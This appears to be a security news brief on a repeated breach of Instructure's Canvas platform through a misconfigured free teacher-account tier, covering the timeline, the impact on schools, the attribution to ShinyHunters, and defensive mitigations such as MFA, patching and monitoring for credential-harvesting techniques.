Second Canvas Breach Exposes Data of Nearly 300 Million Users

TL;DR: Instructure confirmed a second Canvas breach on May 7, exposing personal data of almost 300 million users and prompting a temporary shutdown of Free‑For‑Teacher accounts.

### Context Instructure’s Canvas learning management system powers grades, assignments and communications for K‑12 schools and universities worldwide. The platform experienced its first publicized breach on May 1, traced to a flaw in the free teacher‑account feature. Just a week later, the same vulnerability was exploited again, disrupting final‑exam week for thousands of institutions.

### Key Facts - Timeline: Attackers accessed Canvas on April 29 and again on May 7. Instructure announced the second incident on its status page on May 7 and restored service by May 8. - Scope: The May 7 breach exposed personal messages and other identifiers for nearly 300 million users, according to the Center for Democracy & Technology. Earlier exposure included names, email addresses and student IDs. - Attack vector: Both incidents leveraged a misconfiguration in the Free‑For‑Teacher account tier, allowing unauthenticated actors to gain entry and modify login pages. - Threat actor: Messages displayed to victims referenced the ShinyHunters ransomware group, which demanded settlements by May 12. No ransom was paid, but the group’s branding confirmed their involvement. - Impact on education: Pennsylvania State University canceled night exams on May 7 and all day exams on May 8. Roanoke County Public Schools warned users not to interact with suspicious messages. Multiple universities reported similar alerts. - Financial and operational cost: While Instructure has not disclosed a monetary figure, the outage forced districts to grant grace periods for assignments and likely incurred emergency IT expenses.

### What It Means The repeat exploitation of the same free‑account flaw highlights a systemic weakness in how ed‑tech vendors secure low‑risk service tiers. Schools now face the reality that student data—grades, attendance and private communications—resides on platforms they cannot audit directly. The breach also underscores the limited regulatory oversight after the U.S. Department of Education’s Office of Educational Technology was shuttered, leaving institutions to rely on vendor security practices alone.

### Mitigations - Disable or restrict free‑teacher accounts until a permanent fix is deployed. - Apply vendor patches immediately; Instructure is expected to release a hardening update for the affected authentication flow. - Monitor for MITRE ATT&CK technique T1078 (Valid Accounts) and T1566 (Phishing) signatures, as attackers altered login pages to harvest credentials. - Enforce multi‑factor authentication for all educator and student accounts to limit credential reuse. - Conduct a rapid inventory of all third‑party integrations with Canvas and verify they meet the latest security baselines. - Prepare an incident‑response playbook specific to LMS outages, including communication templates for students, parents and staff.

Watch for Instructure’s forthcoming security advisory and any legal actions that may shape future compliance requirements for educational technology providers.